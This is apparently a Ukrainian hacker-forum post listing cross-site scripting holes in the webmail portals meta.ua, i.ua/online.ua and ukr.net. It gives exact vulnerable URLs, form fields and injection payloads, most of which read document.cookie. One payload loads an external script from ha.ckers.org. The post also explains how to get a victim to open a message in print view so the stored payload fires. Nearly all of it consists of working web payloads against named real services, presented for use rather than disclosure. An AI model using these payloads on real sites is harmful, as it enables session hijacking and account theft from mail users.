декілька активних та пасивних ксс на українскьких почтовиках “meta.ua“, “i.ua” та “ukr.net“..

meta.ua

активка1:
в вхідних > печать

• http://webmail.meta.ua/compose.php?newMessage=true&mailbox=INBOX
• Кому: blabla@meta.ua
     Тема: <img src=’http://uasc.org.ua/favicon.ico’ onload=alert(document.cookie);>
• “Отправить”
• коли лист прийде жертві, вона повинна нажати відкрити його, і нажати “Версия для печати”, спрацює xss

активка2:

• http://contact.meta.ua/ > “Моя Сторiнка”
• “Виконавцi:” >> “Редагувати” >> “Додати”
• “Виконавець/група” >> <img src=”http://uasc.org.ua/favicon.ico” onload=alert(document.cookie);>
• повертаємося на “Моя Сторiнка”

пасивки:

• BlackPanther:
     http://contact.meta.ua/register/”><script>alert(1)</script>
• BlackPanther:
     http://chat.meta.ua/index.php?user_lang=&sauth=”><script>alert(1)</script>

i.ua

пасивки:

• http://index.online.ua/?q=”><script>alert(document.cookie);</script>
• http://travel.online.ua/search/search.php?tt=pk&frmCountryID=115&frmCityID=&fRegID=1&dts=19.09.2009&dte=26.09.2009&len=7-9&frmAcmd=dbl&frmTransport=&hcat=&frmPriceTo=http%3A%2F%2Findex.online.ua%2F%3Fq%3D%22%3E<script>alert(document.cookie);</script>&x=73&y=10

не ксс:

• http://play.online.ua/?cat=casualpcgames&act=genre&code[]=tetris-lines

ukr.net

активка1:

• http://freemail.ukr.net/…/q/userinfo
• Имя: “><img src=”http://uasc.org.ua/favicon.ico” onload=alert(1)>

пасивки:

• http://job.ukr.net/vacancy/?Keywords=</title><SCRIPT SRC=//ha.ckers.org/.j>
• http://play.ukr.net/videos/search?text=”><script>alert(document.cookie);</script>”
• http://kino.ukr.net/adlink.php?url=javascript:alert(1);&m=3770&c=&p=
     * тільки в Опері